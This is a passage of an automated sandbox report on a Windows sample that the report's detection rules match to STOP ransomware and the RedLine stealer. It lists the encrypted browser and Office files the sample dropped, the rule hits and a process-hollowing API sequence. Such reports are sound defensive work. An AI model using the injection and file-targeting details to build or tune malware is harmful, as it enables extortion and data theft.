        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409006148184320.txt entropy: 7.99832434974Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409024501033688.txt entropy: 7.99820748165Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409024089824579.txt entropy: 7.99842834403Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409023789902202.txt entropy: 7.99826668181Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409022763610746.txt entropy: 7.99845296842Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409021833987004.txt entropy: 7.99830440196Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409021046094069.txt entropy: 7.9984486322Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409010467962588.txt entropy: 7.99852943603Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409009155626780.txt entropy: 7.99842824091Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133680527526428814.txt entropy: 7.99851360462Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133680527226805579.txt entropy: 7.9982426812Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.9964191575Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite entropy: 7.99855048931Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.993627648Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99695483172Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db entropy: 7.9910668885Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db entropy: 7.99422938169Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt entropy: 7.99776955538Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5959.0\edge_tracking_page_validator.js entropy: 7.9964085138Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata\verified_contents.json entropy: 7.99201278314Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr-CA\strings.json entropy: 7.9904250119Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json entropy: 7.9902643328Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it\strings.json entropy: 7.99669624816Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr\strings.json entropy: 7.99731176851Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\es\strings.json entropy: 7.99669907437Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\en-GB\strings.json entropy: 7.99693228186Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de\strings.json entropy: 7.99713376835Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar\strings.json entropy: 7.99765841128Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id\strings.json entropy: 7.9968583305Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr-CA\strings.json entropy: 7.99736933069Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hans\strings.json entropy: 7.99657476167Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv\strings.json entropy: 7.99688654767Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru\strings.json entropy: 7.99759253623Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT\strings.json entropy: 7.99707151774Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR\strings.json entropy: 7.9966537201Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\nl\strings.json entropy: 7.99658574747Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja\strings.json entropy: 7.99745015026Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant\strings.json entropy: 7.99617608223Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js entropy: 7.99785039694Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js entropy: 7.99433262834Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cy.hyb entropy: 7.99534807564Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cu.hyb entropy: 7.99675628581Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-ga.hyb entropy: 7.99496536063Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-et.hyb entropy: 7.99033215858Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-us.hyb entropy: 7.99678763941Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-gb.hyb entropy: 7.99657779119Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-ch-1901.hyb entropy: 7.99839648435Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1996.hyb entropy: 7.99837520132Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1901.hyb entropy: 7.99822697815Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nb.hyb entropy: 7.99857533608Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.rigd (copy) entropy: 7.9973563103Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.rigd (copy) entropy: 7.99613662509Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.rigd (copy) entropy: 7.99345786007Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.rigd (copy) entropy: 7.99139558981Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.rigd (copy) entropy: 7.99273893534Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.rigd (copy) entropy: 7.99284826368Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db.rigd (copy) entropy: 7.99796321266Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db.rigd (copy) entropy: 7.99827750981Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.rigd (copy) entropy: 7.99742654722Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.rigd (copy) entropy: 7.99810147388Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.rigd (copy) entropy: 7.992747066Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.rigd (copy) entropy: 7.9964191575Jump to dropped file

        System Summary

        barindex
        Source: 2.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 2.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 9.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 9.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 6.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 6.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 7.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 7.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 5.2.C0XWmZAnYk.exe.c115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 5.2.C0XWmZAnYk.exe.c115a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 8.2.C0XWmZAnYk.exe.cb15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 8.2.C0XWmZAnYk.exe.cb15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 8.2.C0XWmZAnYk.exe.cb15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 8.2.C0XWmZAnYk.exe.cb15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 6.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 6.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 12.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 12.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 9.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 9.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 0.2.C0XWmZAnYk.exe.c315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0.2.C0XWmZAnYk.exe.c315a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 12.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 12.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 2.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 2.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 4.2.C0XWmZAnYk.exe.cb15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 4.2.C0XWmZAnYk.exe.cb15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 5.2.C0XWmZAnYk.exe.c115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 5.2.C0XWmZAnYk.exe.c115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 7.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 7.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 4.2.C0XWmZAnYk.exe.cb15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 4.2.C0XWmZAnYk.exe.cb15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 11.2.C0XWmZAnYk.exe.ca15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 11.2.C0XWmZAnYk.exe.ca15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 0.2.C0XWmZAnYk.exe.c315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0.2.C0XWmZAnYk.exe.c315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 11.2.C0XWmZAnYk.exe.ca15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 11.2.C0XWmZAnYk.exe.ca15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 00000005.00000002.2099680252.0000000000B79000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000000.00000002.2046446224.0000000000A53000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 0000000B.00000002.2265091941.0000000000945000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000004.00000002.2081980325.0000000000A6D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 00000008.00000002.2184694320.0000000000B0D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000008.00000002.2184814046.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0000000B.00000002.2265343028.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 1400, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 3208, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 6512, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 7084, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 2684, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 6776, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 4536, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 6360, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 6984, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 5260, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_00C30110
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,4_2_00CB0110
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C10110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,5_2_00C10110
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C400D00_2_00C400D0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C370E00_2_00C370E0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C330F00_2_00C330F0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C3B0B00_2_00C3B0B0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C3B0000_2_00C3B000
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C3A0260_2_00C3A026
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C4F0300_2_00C4F030
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C5D1A40_2_00C5D1A4
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C7E1410_2_00C7E141
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C391200_2_00C39120
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00CB22C00_2_00CB22C0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C372200_2_00C37220
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C373930_2_00C37393
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C7E37C0_2_00C7E37C
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C335200_2_00C33520
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C375200_2_00C37520
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C3E6E00_2_00C3E6E0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C7B69F0_2_00C7B69F
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C3A6990_2_00C3A699
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C5D7F10_2_00C5D7F1
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C3A79A0_2_00C3A79A
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C3C7600_2_00C3C760
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C518D00_2_00C518D0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C378800_2_00C37880
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C389D00_2_00C389D0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C359F70_2_00C359F7
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C5E9A30_2_00C5E9A3
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C5F9B00_2_00C5F9B0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C3A9160_2_00C3A916
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C37A800_2_00C37A80
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C3CA100_2_00C3CA10
